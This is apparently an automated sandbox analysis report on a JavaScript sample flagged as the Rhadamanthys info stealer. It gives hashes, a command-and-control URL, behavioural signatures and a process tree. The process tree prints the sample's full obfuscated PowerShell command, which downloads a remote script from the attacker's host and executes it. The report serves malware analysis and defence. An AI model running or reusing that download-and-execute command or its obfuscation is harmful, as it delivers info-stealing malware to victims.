Analysis
-
max time kernel
114s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
06/03/2025, 22:25
Static task
static1
Behavioral task
behavioral1
Sample
output2.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
output2.js
Resource
win10v2004-20250217-en
General
-
Target
output2.js
-
Size
19KB
-
MD5
7ad2fc01023899cc905e620961271150
-
SHA1
7cd2e2d7086d59a3697c96ccfd705707ed2c3a87
-
SHA256
b112d4db1d6ae3827653246c4f2b7413502ca1098ca2a1d00b6535b26ece0603
-
SHA512
c710a96754e9b7a29c7113643bbb4b36012cc3a9d7491fc4b26a1059804c2e3f10039af7fdcdd1cc3a00768d515ed67855b805f45a83b130fb9c28a16f38769f
-
SSDEEP
384:8R/vtrEGocUVdRtacNP8t1JaZHVI2+sRLlejNZdbjzn:uZEGon8t1CL8jlT
Malware Config
Extracted
https://pegas.durablyscrimmage.rent/awjxs.recaptcha
Signatures
-
Detects Rhadamanthys payload 1 IoCs
resource yara_rule behavioral2/memory/5504-1375-0x0000000000400000-0x0000000000481000-memory.dmp Rhadamanthys_v8 -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2240 created 3476 2240 powershell.exe 55 PID 5504 created 2624 5504 powershell.exe 44 -
Blocklisted process makes network request 1 IoCs
flow pid Process 11 2240 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation wscript.exe -
pid Process 2240 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2240 set thread context of 5504 2240 powershell.exe 109 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5764 5504 WerFault.exe 109 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 2240 powershell.exe 2240 powershell.exe 2240 powershell.exe 2240 powershell.exe 2240 powershell.exe 5504 powershell.exe 5504 powershell.exe 5504 powershell.exe 5504 powershell.exe 5632 svchost.exe 5632 svchost.exe 5632 svchost.exe 5632 svchost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 2240 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1848 wrote to memory of 2240 1848 wscript.exe 84 PID 1848 wrote to memory of 2240 1848 wscript.exe 84 PID 1848 wrote to memory of 2240 1848 wscript.exe 84 PID 2240 wrote to memory of 5504 2240 powershell.exe 109 PID 2240 wrote to memory of 5504 2240 powershell.exe 109 PID 2240 wrote to memory of 5504 2240 powershell.exe 109 PID 2240 wrote to memory of 5504 2240 powershell.exe 109 PID 2240 wrote to memory of 5504 2240 powershell.exe 109 PID 2240 wrote to memory of 5504 2240 powershell.exe 109 PID 2240 wrote to memory of 5504 2240 powershell.exe 109 PID 2240 wrote to memory of 5504 2240 powershell.exe 109 PID 2240 wrote to memory of 5504 2240 powershell.exe 109 PID 2240 wrote to memory of 5504 2240 powershell.exe 109 PID 5504 wrote to memory of 5632 5504 powershell.exe 110 PID 5504 wrote to memory of 5632 5504 powershell.exe 110 PID 5504 wrote to memory of 5632 5504 powershell.exe 110 PID 5504 wrote to memory of 5632 5504 powershell.exe 110 PID 5504 wrote to memory of 5632 5504 powershell.exe 110
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2624
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5632
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3476
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\output2.js2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -c ([System.Net.WebClient]::New().DownloadString('https://pegas.durablyscrimmage.rent/awjxs.recaptcha'))|.( (GV She*d -ValueO)[1]+(ChildItem Variable:S*ell*d).Value[13]+'x')3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2240
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5504 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5504 -s 3243⤵
- Program crash
PID:5764
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5504 -ip 55041⤵PID:5696
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82